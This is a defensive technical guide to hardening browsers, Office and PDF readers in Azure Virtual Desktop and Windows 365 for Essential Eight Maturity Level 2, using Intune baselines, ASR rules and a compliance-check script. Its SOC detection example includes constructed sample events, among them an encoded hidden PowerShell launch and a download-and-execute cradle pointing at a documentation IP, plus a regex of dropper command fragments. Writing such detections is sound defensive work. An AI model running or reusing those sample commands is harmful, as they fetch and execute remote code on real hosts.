Implementing Essential 8 Maturity Level 2 in Microsoft Cloud VDI (AVD & W365) – User Application Hardening

Harden browsers, Office apps, and PDF readers in Azure Virtual Desktop and Windows 365 with Intune, Defender, and SOC-integrated controls.

We’ve all had that one poorly made coffee that somehow ruins your morning flow — bitter, messy, and impossible to fix once poured. In many ways, unprotected applications in a virtual desktop are the same. A single dodgy browser plugin or outdated PDF reader can completely spoil your security blend. That’s where User Application Hardening comes in. It keeps the bad add-ins and malicious macros from spilling into your users’ sessions.

What is User Application Hardening?

User Application Hardening is one of the Australian Cyber Security Centre (ACSC) Essential Eight strategies. At Maturity Level 2 (ML2), it’s all about reducing exposure in user-facing applications — browsers, Office apps, PDF readers, and similar — by removing or disabling risky capabilities.

In plain terms, it means:

  • Removing or disabling Internet Explorer 11
  • Stopping browsers from processing Java and Flash content from the internet, and removing other deprecated runtimes
  • Blocking Office from running macros from the internet, creating executable content, injecting code into other processes, or launching child processes
  • Hardening PDF readers so they cannot run scripts or spawn child processes

These changes collectively close high-frequency exploitation routes that adversaries love to abuse.

How it Works in Cloud VDI

For both Azure Virtual Desktop (AVD) and Windows 365 Cloud PCs, these controls are applied through centralised management and policy enforcement. The approach differs slightly depending on how compute sessions are delivered.

  • Azure Virtual Desktop (AVD):
    Multi-session environments typically use a golden image that includes hardened apps and preconfigured baselines. Configuration policies are applied using Microsoft Intune, Group Policy Objects (GPOs), and Defender for Endpoint integration via the session host templates.

  • Windows 365:
    Each Cloud PC runs as a dedicated instance for a single user. Intune device policies and security baselines map directly to each machine, which simplifies lifecycle management.

Policy Flow Diagram

flowchart LR
    A[Intune & Defender Policies] --> B{Policy Delivery}
    B --> C[Azure Virtual Desktop Session Hosts]
    B --> D[Windows 365 Cloud PCs]
    C --> E["Applications Hardened (Edge, Office, Acrobat Reader)"]
    D --> E
    E --> F["Telemetry sent to Defender / SIEM"]
    F --> G[Security Operations Centre for Analysis]

This unified approach enforces restriction policies across the environment and provides telemetry for continuous oversight through Defender and log integrations.

Real-World Impact

Attackers exploit what users trust most: browsers, email attachments, spreadsheets, and documents. A single Office macro in a weaponised document can launch PowerShell and pull down a dropper within seconds of the user clicking "Enable Content".

User Application Hardening directly trims these attack surfaces. When paired with logging and timely analysis, it creates a resilient, self-defending virtual desktop environment that meets both ACSC ML2 obligations and enterprise expectations for modern security operations.

The business outcome: fewer incidents, faster detection, and a far more predictable user experience.

Implementation Example

Intune

You can deliver application hardening through a small set of Intune profiles (the Microsoft Edge baseline, the Microsoft 365 Apps baseline, an Attack Surface Reduction policy, and a custom profile for the PDF reader) that together implement the ML2 browser, Office, and PDF settings.

Step 1 – Create a consolidated configuration profile
  1. In the Microsoft Intune admin centre, go to Endpoint Security → Security Baselines → Microsoft Edge baseline.

  2. Select Create Profile and assign a clear name such as Essential8-UserApplicationHardening-ML2.

  3. Apply the following browser protection settings derived from both ASD and Microsoft guidance:

    Category             Setting                                        Recommended value
    SmartScreen          Require SmartScreen for URLs                   Enabled
    Plugins              Allow Adobe Flash and Java                     Disabled
    Tracking Prevention  Apply Strict Mode                              Enabled
    Extensions           Block unapproved extensions                    Enabled
    Security Updates     Disallow user override of update policy        Enabled
    IE Mode              Disable IE Integration                         Enabled
    JavaScript           Allow only signed scripts from trusted zones   Enabled
    Site Security        Prevent site isolation overrides               Enabled

    The setting names above are descriptive; match each one against the exact policy name in the baseline version you deploy. ML2 also requires that users cannot change browser security settings, so confirm the baseline locks these values rather than merely setting defaults.
  4. Assign the profile to both AVD session host and Windows 365 device groups.

The Edge baseline protects browsers against common vectors such as legacy plugin content (Java, Flash), malicious ads, and unapproved extensions.

Step 2 – Office and PDF Hardening
  • Add the Microsoft 365 Apps Baseline to disable macro execution from the Internet and restrict add-ins to trusted publishers.
  • Enforce ASR rules to block child process creation, executable content, and code injection:
    • D4F940AB-401B-4EFC-AADC-AD5F3C50688A (Child Processes)
    • 3B576869-A4EC-4529-8536-B80A7769E899 (Executable Content)
    • 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 (Code Injection)
  • Add the Adobe Reader ASR rule 7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C (Block Adobe Reader from creating child processes); ML2 requires PDF software to be blocked from spawning child processes, not just Office.
  • Deploy a custom configuration profile for the PDF reader that disables JavaScript and network features. For Acrobat Reader DC the values live under HKLM\SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown: bDisableJavaScript=1, bProtectedMode=1, and iProtectedView=2 (Protected View for all files).

Step 3 – Defender for Endpoint Integration

Onboard the session hosts to Defender for Endpoint so that ASR rule state and block events flow into your telemetry. Note that onboarding does not set ASR rules by itself; enforcement comes from the Intune ASR policy in Step 2 (or Set-MpPreference on the image). In Azure the onboarding extension is normally deployed by Defender for Cloud auto-provisioning when the Defender for Servers plan is enabled, which also supplies the onboarding settings; the Bicep below shows the resource shape if you need to declare it explicitly:

// Name of the existing AVD session host VM the extension attaches to
param sessionHostName string

resource avdSessionHost 'Microsoft.Compute/virtualMachines@2022-11-01' existing = {
  name: sessionHostName
}

// Defender for Endpoint onboarding extension (publisher Microsoft.Azure.AzureDefenderForServers)
resource avdVmExtension 'Microsoft.Compute/virtualMachines/extensions@2022-11-01' = {
  name: 'AVD-Defender-Policy'
  parent: avdSessionHost
  location: avdSessionHost.location
  properties: {
    publisher: 'Microsoft.Azure.AzureDefenderForServers'
    type: 'MDE.Windows'
    typeHandlerVersion: '1.0'
    autoUpgradeMinorVersion: true
  }
}
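Once the three steps have applied, the sensible next move is to read the state back from a session host rather than trust the Intune compliance tile. The script below is an added example, not code from the original post or from Microsoft; it is written as an Intune remediation detection script (exit 1 = non-compliant) and assumes Acrobat Reader DC is the PDF reader, that the four ASR rules listed are the ones in scope, and that the Edge and Acrobat registry values shown are the ones your profiles push.

```powershell
# Added example (not from the original post): reads back the effective user
# application hardening state on an AVD session host or Cloud PC after the
# Intune/GPO policies have applied. Shaped as an Intune remediation detection
# script: exit 1 = non-compliant, exit 0 = compliant. Run elevated.
# Assumptions: Adobe Acrobat Reader DC is the PDF reader; the four ASR rules
# below are the ones in scope; the Edge and Acrobat values are those deployed.

# ASR rules and the Microsoft-published GUID for each (must be in Block mode)
$AsrRules = @{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Office: block child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Office: block executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Office: block code injection'
    '7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C' = 'Adobe Reader: block child processes'
}

# Acrobat Reader FeatureLockDown values pushed by the custom PDF profile
$AcrobatKey = 'HKLM:\SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown'
$AcrobatExpected = @{
    bDisableJavaScript = 1   # no document JavaScript
    bProtectedMode     = 1   # sandbox stays on
    iProtectedView     = 2   # Protected View for every file, not only untrusted ones
}

# Edge policy values from the Edge baseline
$EdgeKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Edge'
$EdgeExpected = @{
    SmartScreenEnabled               = 1
    PreventSmartScreenPromptOverride = 1   # users cannot click through warnings
    InternetExplorerIntegrationLevel = 0   # IE mode off
}

# Windows optional features that the control expects to be disabled or absent
$LegacyFeatures = @{
    'Internet-Explorer-Optional-amd64' = 'Internet Explorer 11'
    'MicrosoftWindowsPowerShellV2Root' = 'Windows PowerShell 2.0'
}

$results = [System.Collections.Generic.List[object]]::new()
function Add-Check {
    param([string]$Control, [string]$Item, [bool]$Pass, [string]$Detail)
    $results.Add([pscustomobject]@{ Control = $Control; Item = $Item; Pass = $Pass; Detail = $Detail })
}

function Test-RegistryValues {
    param([string]$Control, [string]$Path, [hashtable]$Expected)
    foreach ($name in $Expected.Keys) {
        $actual = (Get-ItemProperty -Path $Path -Name $name -ErrorAction SilentlyContinue).$name
        Add-Check $Control $name ($actual -eq $Expected[$name]) "expected=$($Expected[$name]) actual=$actual"
    }
}

# 1. ASR: Get-MpPreference returns parallel arrays of rule IDs and actions (1 = Block)
$mp  = Get-MpPreference
$ids = @($mp.AttackSurfaceReductionRules_Ids | ForEach-Object { "$_".ToUpperInvariant() })
foreach ($guid in $AsrRules.Keys) {
    $idx    = [array]::IndexOf($ids, $guid)
    $action = if ($idx -ge 0) { $mp.AttackSurfaceReductionRules_Actions[$idx] } else { 'not set' }
    Add-Check 'ASR' $AsrRules[$guid] ($action -eq 1) "action=$action (1=Block, 2=Audit, 6=Warn)"
}

# 2. Registry-backed settings for the PDF reader and the browser
Test-RegistryValues 'PDF'  $AcrobatKey $AcrobatExpected
Test-RegistryValues 'Edge' $EdgeKey    $EdgeExpected

# 3. Legacy components: 'Enabled' fails; 'Disabled' or not present on this build passes
foreach ($feature in $LegacyFeatures.GetEnumerator()) {
    $f = Get-WindowsOptionalFeature -Online -FeatureName $feature.Key -ErrorAction SilentlyContinue
    $state = if ($f) { $f.State } else { 'NotPresent' }
    Add-Check 'Legacy' $feature.Value ($state -ne 'Enabled') "state=$state"
}

$results | Format-Table -AutoSize
if ($results.Pass -contains $false) { exit 1 } else { exit 0 }
```

Run it on a freshly built session host and again on one that has been live for a few weeks; a drift between the two usually means a GPO or a local admin is fighting the Intune profile (see Dual Configuration Sources under Gotchas). An ASR rule reporting action 2 (Audit) is the common miss: the rule is "deployed" but blocks nothing.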

Logging, Monitoring, and Timely Analysis

ML2 goes beyond configuration — it demands that logs are collected, retained, and analysed in a timely manner to detect and respond to threats.

That means enabling and centralising:

  • Process creation events with the command line included (Event ID 4688, which only carries the command line once "Include command line in process creation events" is enabled)
  • PowerShell module logging (Event ID 4103) and script block logging (Event ID 4104)
  • Defender for Endpoint telemetry
  • Application event logs for Office, Edge, and Acrobat

Logs should funnel into a single collection point for active analysis — not passive storage. This is where a Security Operations Centre (SOC) capability becomes essential.
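To make "active analysis" concrete, here is an added example (not from the original post) of the kind of detection a SOC would run over the 4688 and 4104 events listed above: it flags Office or Acrobat spawning a scripting host, and hostile command lines or script blocks. The events are constructed samples in the shape that ConvertFrom-WinEvent produces from real records; the parent/child pairs and the regex are assumptions for illustration, not a complete rule set.

```powershell
# Added example (not from the original post): detection logic over 4688 / 4104
# events in support of the ML2 "timely analysis" requirement. $SampleEvents are
# constructed, not real telemetry; in production pipe Get-WinEvent output
# through ConvertFrom-WinEvent instead.

# Flattens an EventLogRecord into one object whose properties are the EventData field names
function ConvertFrom-WinEvent {
    param([Parameter(ValueFromPipeline)][System.Diagnostics.Eventing.Reader.EventLogRecord]$Record)
    process {
        $x = [xml]$Record.ToXml()
        $o = [ordered]@{ Id = $Record.Id; Time = $Record.TimeCreated; Computer = $Record.MachineName }
        foreach ($d in $x.Event.EventData.Data) { $o[$d.Name] = $d.'#text' }
        [pscustomobject]$o
    }
}

# Assumed watch lists: user-facing apps that should never spawn a scripting host
$OfficeParents      = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'ACRORD32.EXE'
$SuspiciousChildren = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe',
                      'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe'
# Fragments typical of macro-delivered droppers (-match is case-insensitive by default)
$HostilePattern = '-enc\b|-encodedcommand|frombase64string|downloadstring|downloadfile|\biex\b|invoke-expression|-w(indowstyle)?\s+hidden'

function Get-UahAlert {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        switch ($e.Id) {
            4688 {
                $parent = [IO.Path]::GetFileName("$($e.ParentProcessName)")
                $child  = [IO.Path]::GetFileName("$($e.NewProcessName)")
                if ($OfficeParents -contains $parent -and $SuspiciousChildren -contains $child) {
                    [pscustomobject]@{ Severity = 'High'; Computer = $e.Computer; Time = $e.Time
                                       User = $e.SubjectUserName; Rule = "$parent spawned $child"; Evidence = $e.CommandLine }
                }
                elseif ("$($e.CommandLine)" -match $HostilePattern) {
                    [pscustomobject]@{ Severity = 'Medium'; Computer = $e.Computer; Time = $e.Time
                                       User = $e.SubjectUserName; Rule = 'Hostile command line'; Evidence = $e.CommandLine }
                }
            }
            4104 {
                if ("$($e.ScriptBlockText)" -match $HostilePattern) {
                    [pscustomobject]@{ Severity = 'Medium'; Computer = $e.Computer; Time = $e.Time
                                       User = $e.SubjectUserName; Rule = 'Hostile script block'; Evidence = $e.ScriptBlockText }
                }
            }
        }
    }
}

# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation address
$SampleEvents = @(
    [pscustomobject]@{ Id = 4688; Time = [datetime]'2024-05-01T09:12:03'; Computer = 'avd-host-01'; SubjectUserName = 'jsmith'
        NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentProcessName = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine       = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
    [pscustomobject]@{ Id = 4688; Time = [datetime]'2024-05-01T09:12:05'; Computer = 'avd-host-01'; SubjectUserName = 'jsmith'
        NewProcessName    = 'C:\Windows\splwow64.exe'            # benign print-driver bridge, not flagged
        ParentProcessName = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine       = 'C:\Windows\splwow64.exe 12288' }
    [pscustomobject]@{ Id = 4104; Time = [datetime]'2024-05-01T09:12:06'; Computer = 'avd-host-01'; Path = ''
        ScriptBlockText   = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.10/a.ps1")' }
    [pscustomobject]@{ Id = 4688; Time = [datetime]'2024-05-01T10:00:00'; Computer = 'cpc-jsmith'; SubjectUserName = 'jsmith'
        NewProcessName    = 'C:\Windows\System32\cmd.exe'        # benign user-launched shell, not flagged
        ParentProcessName = 'C:\Windows\explorer.exe'
        CommandLine       = 'cmd.exe /c dir' }
)

Get-UahAlert -Events $SampleEvents | Format-Table -AutoSize
```

Against the sample set this raises two alerts: the High-severity Word-to-PowerShell spawn and the Medium-severity download cradle in the script block; the splwow64 and explorer events pass. With the ASR rules from Step 2 in Block mode the first event should never occur, so its appearance in the logs is itself evidence that a host has drifted out of policy, which is exactly the kind of finding the SOC needs to act on rather than file.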

If you already operate an in-house SOC, integrate AVD and Windows 365 telemetry into your existing monitoring workflows through Microsoft Sentinel.

If you don’t, consider:

  • Huntress SIEM – a streamlined, cloud-based offering ideal for smaller environments looking to meet ML2 logging analysis obligations, or
  • A Managed Sentinel deployment delivered through a Microsoft partner providing continuous SOC monitoring, threat correlation, and response capability.

The ACSC expectation is that indicators of compromise are identified and acted on quickly — it’s not compliance until there’s detection with action behind it.

Gotchas & Edge Cases

  • Dual Configuration Sources: Avoid policy conflicts between Intune and GPO; choose a single management authority.
  • Macro-Dependent Workflows: Use digitally signed macros or trusted locations instead of disabling macros entirely.
  • PDF Vendor Support: Ensure your preferred PDF tool supports configuration at policy level.
  • SOC Gaps: Logging without analysis breaches ML2 intent. Every control should have someone — or something — watching logs for anomalies.

Best Practices

  1. Use Microsoft Security Baselines as a foundation and overlay ACSC guidance.
  2. Harden images upstream for AVD; redeploy session hosts from a clean, compliant golden image.
  3. Link to Defender for Endpoint early to capture telemetry.
  4. Enable SIEM integration from day one to meet the “timely analysis” requirement.
  5. Automate validation using PowerShell scripts and Azure Policy compliance checks.
  6. Document deviations and review them quarterly to retain ML2 alignment.
🍺 Brewed Insight: Like brewing a double-shot, this control is all about pressure and precision. Tighten policies too hard and workflow suffers; too loose, and your security posture leaks. The right blend of Intune policies, Defender enforcement, and SOC visibility keeps your digital espresso crisp and strong every time.

Learn More